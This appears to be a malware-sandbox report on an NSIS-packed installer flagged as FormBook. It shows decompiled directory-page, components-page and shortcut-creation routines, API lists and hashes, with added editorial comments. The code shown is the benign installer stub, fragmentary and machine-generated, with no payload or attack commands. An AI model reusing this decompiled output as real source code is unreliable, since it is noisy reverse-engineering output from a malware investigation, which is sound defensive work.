                                                                        							if(_a8 == 0x200) {
                                                                        								SendMessageA(_v8, 0x200, _t315, _t315);
                                                                        							}
                                                                        							if(_a8 == 0x40b) {
                                                                        								_t220 =  *0x79f564;
                                                                        								if(_t220 != _t315) {
                                                                        									ImageList_Destroy(_t220);
                                                                        								}
                                                                        								_t221 =  *0x79f578;
                                                                        								if(_t221 != _t315) {
                                                                        									GlobalFree(_t221);
                                                                        								}
                                                                        								 *0x79f564 = _t315;
                                                                        								 *0x79f578 = _t315;
                                                                        								 *0x7a2fe0 = _t315;
                                                                        							}
                                                                        							if(_a8 != 0x40f) {
                                                                        								L86:
                                                                        								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
                                                                        									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                                        									ShowWindow(_v8, _t316);
                                                                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                        								}
                                                                        								goto L89;
                                                                        							} else {
                                                                        								E004011EF(_t289, _t315, _t315);
                                                                        								if(_a12 != _t315) {
                                                                        									E00401410(8);
                                                                        								}
                                                                        								if(_a16 == _t315) {
                                                                        									L73:
                                                                        									E004011EF(_t289, _t315, _t315);
                                                                        									_v32 =  *0x79f578;
                                                                        									_t196 =  *0x7a2fa8;
                                                                        									_v60 = 0xf030;
                                                                        									_v16 = _t315;
                                                                        									if( *0x7a2fac <= _t315) {
                                                                        										L84:
                                                                        										InvalidateRect(_v8, _t315, 1);
                                                                        										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
                                                                        											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
                                                                        										}
                                                                        										goto L86;
                                                                        									}
                                                                        									_t281 = _t196 + 8;
                                                                        									do {
                                                                        										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                        										if(_t202 != _t315) {
                                                                        											_t291 =  *_t281;
                                                                        											_v68 = _t202;
                                                                        											_v72 = 8;
                                                                        											if((_t291 & 0x00000001) != 0) {
                                                                        												_v72 = 9;
                                                                        												_v56 =  &(_t281[4]);
                                                                        												_t281[0] = _t281[0] & 0x000000fe;
                                                                        											}
                                                                        											if((_t291 & 0x00000040) == 0) {
                                                                        												_t206 = (_t291 & 0x00000001) + 1;
                                                                        												if((_t291 & 0x00000010) != 0) {
                                                                        													_t206 = _t206 + 3;
                                                                        												}
                                                                        											} else {
                                                                        												_t206 = 3;
                                                                        											}
                                                                        											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                        											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                        											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                        										}
                                                                        										_v16 = _v16 + 1;
                                                                        										_t281 =  &(_t281[0x106]);
                                                                        									} while (_v16 <  *0x7a2fac);
                                                                        									goto L84;
                                                                        								} else {
                                                                        									_t282 = E004012E2( *0x79f578);
                                                                        									E00401299(_t282);
                                                                        									_t217 = 0;
                                                                        									_t289 = 0;
                                                                        									if(_t282 <= _t315) {
                                                                        										L72:
                                                                        										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                        										_a16 = _t282;
                                                                        										_a8 = 0x420;
                                                                        										goto L73;
                                                                        									} else {
                                                                        										goto L69;
                                                                        									}
                                                                        									do {
                                                                        										L69:
                                                                        										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                                        											_t289 = _t289 + 1;
                                                                        										}
                                                                        										_t217 = _t217 + 1;
                                                                        									} while (_t217 < _t282);
                                                                        									goto L72;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                        							goto L89;
                                                                        						} else {
                                                                        							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                        							if(_t227 == 0xffffffff) {
                                                                        								goto L89;
                                                                        							}
                                                                        							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                        							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                                        								_t283 = 0x20;
                                                                        							}
                                                                        							E00401299(_t283);
                                                                        							SendMessageA(_a4, 0x420, _t315, _t283);
                                                                        							_a12 = 1;
                                                                        							_a16 = _t315;
                                                                        							_a8 = 0x40f;
                                                                        							goto L56;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					 *0x7a2fe0 = _a4;
                                                                        					_t285 = 2;
                                                                        					_v28 = 0;
                                                                        					_v16 = _t285;
                                                                        					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
                                                                        					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
                                                                        					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
                                                                        					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                        					 *0x79f564 = _t252;
                                                                        					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                        					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
                                                                        					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                        						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                        					}
                                                                        					DeleteObject(_v24);
                                                                        					_t286 = 0;
                                                                        					do {
                                                                        						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                        						if(_t258 != _t315) {
                                                                        							if(_t286 != 0x20) {
                                                                        								_v16 = _t315;
                                                                        							}
                                                                        							_push(_t258);
                                                                        							_push(_t315);
                                                                        							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
                                                                        						}
                                                                        						_t286 = _t286 + 1;
                                                                        					} while (_t286 < 0x21);
                                                                        					_t317 = _a16;
                                                                        					_t287 = _v16;
                                                                        					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                        					_push(0x15);
                                                                        					E00403DA7(_a4);
                                                                        					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                        					_push(0x16);
                                                                        					E00403DA7(_a4);
                                                                        					_t318 = 0;
                                                                        					_t288 = 0;
                                                                        					if( *0x7a2fac <= 0) {
                                                                        						L19:
                                                                        						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                        						goto L20;
                                                                        					} else {
                                                                        						_t311 = _v32 + 8;
                                                                        						_v24 = _t311;
                                                                        						do {
                                                                        							_t268 = _t311 + 0x10;
                                                                        							if( *_t268 != 0) {
                                                                        								_v60 = _t268;
                                                                        								_t269 =  *_t311;
                                                                        								_t302 = 0x20;
                                                                        								_v84 = _t288;
                                                                        								_v80 = 0xffff0002;
                                                                        								_v76 = 0xd;
                                                                        								_v64 = _t302;
                                                                        								_v40 = _t318;
                                                                        								_v68 = _t269 & _t302;
                                                                        								if((_t269 & 0x00000002) == 0) {
                                                                        									if((_t269 & 0x00000004) == 0) {
                                                                        										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                        									} else {
                                                                        										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                        									}
                                                                        								} else {
                                                                        									_v76 = 0x4d;
                                                                        									_v44 = 1;
                                                                        									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                        									_v28 = 1;
                                                                        									 *( *0x79f578 + _t318 * 4) = _t274;
                                                                        									_t288 =  *( *0x79f578 + _t318 * 4);
                                                                        								}
                                                                        							}
                                                                        							_t318 = _t318 + 1;
                                                                        							_t311 = _v24 + 0x418;
                                                                        							_v24 = _t311;
                                                                        						} while (_t318 <  *0x7a2fac);
                                                                        						if(_v28 != 0) {
                                                                        							L20:
                                                                        							if(_v16 != 0) {
                                                                        								E00403DDC(_v8);
                                                                        								_t280 = _v32;
                                                                        								_t315 = 0;
                                                                        								goto L23;
                                                                        							} else {
                                                                        								ShowWindow(_v12, 5);
                                                                        								E00403DDC(_v12);
                                                                        								L89:
                                                                        								return E00403E0E(_a8, _a12, _a16);
                                                                        							}
                                                                        						}
                                                                        						goto L19;
                                                                        					}
                                                                        				}
                                                                        			}
[Instruction-address column for the decompiled block above (addresses 0x004046c5 through 0x00404c8a), extracted from the report without the source lines it was aligned to.]
                                                                        0x004047d7
                                                                        0x004047dc
                                                                        0x004047df
                                                                        0x004047e2
                                                                        0x004047e6
                                                                        0x004047eb
                                                                        0x004047f0
                                                                        0x004047f4
                                                                        0x004047f9
                                                                        0x004047fe
                                                                        0x00404800
                                                                        0x00404808
                                                                        0x004048d2
                                                                        0x004048e5
                                                                        0x00000000
                                                                        0x0040480e
                                                                        0x00404811
                                                                        0x00404814
                                                                        0x00404817
                                                                        0x00404817
                                                                        0x0040481d
                                                                        0x00404823
                                                                        0x00404826
                                                                        0x0040482c
                                                                        0x0040482d
                                                                        0x00404832
                                                                        0x0040483b
                                                                        0x00404842
                                                                        0x00404845
                                                                        0x00404848
                                                                        0x0040484b
                                                                        0x00404887
                                                                        0x004048b0
                                                                        0x00404889
                                                                        0x00404896
                                                                        0x00404896
                                                                        0x0040484d
                                                                        0x00404850
                                                                        0x0040485f
                                                                        0x00404869
                                                                        0x00404871
                                                                        0x00404878
                                                                        0x00404880
                                                                        0x00404880
                                                                        0x0040484b
                                                                        0x004048b6
                                                                        0x004048b7
                                                                        0x004048c3
                                                                        0x004048c3
                                                                        0x004048d0
                                                                        0x004048eb
                                                                        0x004048ef
                                                                        0x0040490c
                                                                        0x00404911
                                                                        0x00404914
                                                                        0x00000000
                                                                        0x004048f1
                                                                        0x004048f6
                                                                        0x004048ff
                                                                        0x00404c8c
                                                                        0x00404c9e
                                                                        0x00404c9e
                                                                        0x004048ef
                                                                        0x00000000
                                                                        0x004048d0
                                                                        0x00404808

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 004046BE
                                                                        • GetDlgItem.USER32 ref: 004046CB
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
                                                                        • LoadBitmapA.USER32 ref: 0040472A
                                                                        • SetWindowLongA.USER32 ref: 0040473D
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
                                                                        • DeleteObject.GDI32(?), ref: 0040479D
                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
                                                                        • GetWindowLongA.USER32 ref: 004048D7
                                                                        • SetWindowLongA.USER32 ref: 004048E5
                                                                        • ShowWindow.USER32(?,00000005), ref: 004048F6
                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
                                                                        • GlobalFree.KERNEL32 ref: 00404AE2
                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
                                                                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
                                                                        • ShowWindow.USER32(?,00000000), ref: 00404C78
                                                                        • GetDlgItem.USER32 ref: 00404C83
                                                                        • ShowWindow.USER32(00000000), ref: 00404C8A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N
                                                                        • API String ID: 1638840714-813528018
                                                                        • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                        • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
                                                                        • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                        • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 68%
			// Decompiled dialog procedure for the installer's directory-selection page. The
			// message numbers and control IDs match the NSIS installer stub (DirProc in NSIS
			// Ui.c): 0x110 = WM_INITDIALOG, 0x111 = WM_COMMAND, 0x405/0x40B/0x40F = NSIS
			// WM_USER+5/+0xB/+0xF notifications, 0x3FB = IDC_DIR (path edit box), 0x3E9 =
			// IDC_BROWSE, 0x3FF/0x400 = "space required"/"space available" labels,
			// 0x300 = EN_CHANGE, 0x41 = BIF_RETURNONLYFSDIRS|BIF_NEWDIALOGSTYLE.
			// Time spent reversing this routine is spent on the NSIS stub, not on the
			// FormBook code the report detects. Comments are editorial additions; the
			// decompiler output itself is left as produced.
			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				// _a4 = dialog HWND, _a8 = message, _a12 = wParam, _a16 = page parameter block
				int _v8;                 // error: 0 ok, 1 invalid install path, 2 not enough disk space
				signed int _v12;         // reused: browse-callback parameter, then "free space known" flag
				long _v16;               // GetDiskFreeSpaceA: number of free clusters
				long _v20;               // GetDiskFreeSpaceA: sectors per cluster
				char _v24;               // GetDiskFreeSpaceExA: total bytes (ULARGE_INTEGER)
				long _v28;               // GetDiskFreeSpaceA: bytes per sector
				char _v32;               // GetDiskFreeSpaceExA: total free bytes
				intOrPtr _v36;           // current page descriptor
				long _v40;               // GetDiskFreeSpaceA: total clusters / high dword of free bytes
				signed int _v44;         // GetDiskFreeSpaceExA: free bytes available (low dword)
				CHAR* _v52;              // BROWSEINFO.lParam  (target directory buffer)
				intOrPtr _v56;           // BROWSEINFO.lpfn    (browse callback E004044DF)
				intOrPtr _v60;           // BROWSEINFO.ulFlags (0x41)
				intOrPtr _v64;           // BROWSEINFO.lpszTitle
				CHAR* _v68;              // BROWSEINFO.pszDisplayName
				void _v72;               // BROWSEINFO.pidlRoot
				char _v76;               // BROWSEINFO.hwndOwner (start of the 7-dword struct)
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t114;
				intOrPtr* _t128;
				signed int _t140;
				signed int _t145;
				CHAR* _t151;

				_t75 =  *0x79ed58;                                  // g_this_page
				_v36 = _t75;
				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;        // user variable holding the install dir (1 KiB slots)
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {                                  // leaving the page: read edit box, sanitize path
					E004052A3(0x3fb, _t151);
					E00405BFB(_t151);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L19:
						if(_a8 == 0x40f) {
							L21:                                    // path changed: validate and recompute free space
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t145 = _t144 | 0xffffffff;             // available KiB, -1 = unknown
							E004052A3(0x3fb, _t151);
							if(E004055AC(_t169, _t151) == 0) {      // is_valid_instpath
								_v8 = 1;
							}
							E004059BF(0x79e550, _t151);             // copy path to scratch buffer
							_t80 = E0040555F(0x79e550);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;       // truncate to drive/share root
							}
							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");   // resolved at runtime, not imported
							if(_t81 == 0) {
								L28:                                // fallback for old Windows: 32-bit cluster arithmetic
								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L31;
								}
								_t100 = _v20 * _v28;                // bytes per cluster
								__eflags = _t100;
								_t145 = MulDiv(_t100, _v16, 0x400); // (bytes/cluster * free clusters) / 1024 with 64-bit intermediate
								goto L30;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x79e550);
								if( *_t81() == 0) {
									goto L28;
								}
								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;   // free bytes (64-bit) -> KiB
								L30:
								_v12 = 1;                           // free space is known
								L31:
								if(_t145 < E004045FA(5)) {          // compare with summed section sizes (KiB)
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {   // language has a "space required" string
									E00404545(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x79e540);  // blank "space available"
									} else {
										E00404545(0x400, 0xfffffffc, _t145);
									}
								}
								_t88 = _v8;
								 *0x7a3024 = _t88;                  // instdir_error flag read by the script engine
								if(_t88 == 0) {
									_v8 = E00401410(7);             // run the .onVerifyInstDir callback
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {   // page flag: never disable Next
									_v8 = 0;
								}
								E00403DC9(0 | _v8 == 0x00000000);   // enable/disable the Next button
								if(_v8 == 0 &&  *0x79f570 == 0) {
									E0040417A();                    // make Next the default button
								}
								 *0x79f570 = 0;
								goto L45;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L45;
						}
						goto L21;
					}
					_t105 = _a12 & 0x0000ffff;                      // LOWORD(wParam) = control id
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {                        // Browse... button
							_t140 = 7;
							memset( &_v72, 0, _t140 << 2);          // zero the rest of BROWSEINFO
							_t144 = 0x79f580;
							_v76 = _a4;
							_v68 = 0x79f580;
							_v56 = E004044DF;
							_v52 = _t151;
							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;                        // cancelled: just re-validate
							} else {
								E0040521C(0, _t110);                // free the returned PIDL
								E004054CC(_t151);                   // add trailing backslash
								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));   // install_directory_auto_append
								if(_t114 != 0) {
									_push(_t114);
									_push(0);
									E004059E1(0x3fb, 0x79f580, _t151);
									_t144 = 0x7a1f20;
									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {    // append only if the chosen folder is not already it
										lstrcatA(_t151, 0x7a1f20);
									}
								}
								 *0x79f570 =  *0x79f570 + 1;        // suppress default-button change on the following update
								SetDlgItemTextA(_a4, 0x3fb, _t151);
							}
						}
						goto L19;
					}
					if(_a12 >> 0x10 != 0x300) {                     // HIWORD(wParam) != EN_CHANGE
						goto L45;
					}
					_a8 = 0x40f;                                    // edit box changed: treat as update
					goto L12;
				} else {                                            // WM_INITDIALOG
					_t144 = GetDlgItem(_a4, 0x3fb);
					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
						E004054CC(_t151);
					}
					 *0x7a2758 = _a4;
					SetWindowTextA(_t144, _t151);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403DA7(_a4);                                 // set browse-button text
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DA7(_a4);                                 // set "select directory" text
					E00403DDC(_t144);                               // focus the edit box
					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");   // optional, resolved at runtime
					if(_t128 == 0) {
						L45:
						return E00403E0E(_a8, _a12, _a16);          // HandleStaticBkColor
					}
					 *_t128(_t144, 1);                              // SHACF_FILESYSTEM
					goto L8;
				}
			}

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 00404230
                                                                        • SetWindowTextA.USER32(00000000,?), ref: 0040425C
                                                                        • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
                                                                        • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
                                                                        • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
                                                                        • SetDlgItemTextA.USER32 ref: 00404369
                                                                          • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
                                                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                          • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                        • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
                                                                        • SetDlgItemTextA.USER32 ref: 0040447E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                                                        • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
                                                                        • API String ID: 2007447535-1909522251
                                                                        • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                        • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
                                                                        • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                        • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E004020A6(void* __eflags) {
                                                                        				void* _t44;
                                                                        				intOrPtr* _t48;
                                                                        				intOrPtr* _t50;
                                                                        				intOrPtr* _t52;
                                                                        				intOrPtr* _t54;
                                                                        				signed int _t58;
                                                                        				intOrPtr* _t59;
                                                                        				intOrPtr* _t62;
                                                                        				intOrPtr* _t64;
                                                                        				intOrPtr* _t66;
                                                                        				intOrPtr* _t69;
                                                                        				intOrPtr* _t71;
                                                                        				int _t75;
                                                                        				signed int _t81;
                                                                        				intOrPtr* _t88;
                                                                        				void* _t95;
                                                                        				void* _t96;
                                                                        				void* _t100;
                                                                        
                                                                        				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
                                                                        				_t96 = E00402A9A(0xffffffdf);
                                                                        				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
                                                                        				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
                                                                        				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
                                                                        				if(E00405538(_t96) == 0) {
                                                                        					E00402A9A(0x21);
                                                                        				}
                                                                        				_t44 = _t100 + 8;
                                                                        				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
                                                                        				if(_t44 < _t75) {
                                                                        					L12:
                                                                        					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                        					_push(0xfffffff0);
                                                                        				} else {
                                                                        					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                        					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
                                                                        					if(_t95 >= _t75) {
                                                                        						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                        						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                        						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                        						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                                        						_t81 =  *(_t100 - 0x14);
                                                                        						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                        						if(_t58 != 0) {
                                                                        							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                        							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                        							_t81 =  *(_t100 - 0x14);
                                                                        						}
                                                                        						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                        						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                        						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
                                                                        							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                        							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
                                                                        						}
                                                                        						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                        						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                                                        						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                        						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                                                        						if(_t95 >= _t75) {
                                                                        							 *0x409418 = _t75;
                                                                        							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
                                                                        							_t69 =  *((intOrPtr*)(_t100 - 8));
                                                                        							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
                                                                        						}
                                                                        						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                                        						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                        					}
                                                                        					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                        					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                        					if(_t95 >= _t75) {
                                                                        						_push(0xfffffff4);
                                                                        					} else {
                                                                        						goto L12;
                                                                        					}
                                                                        				}
                                                                        				E00401428();
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
                                                                        Strings
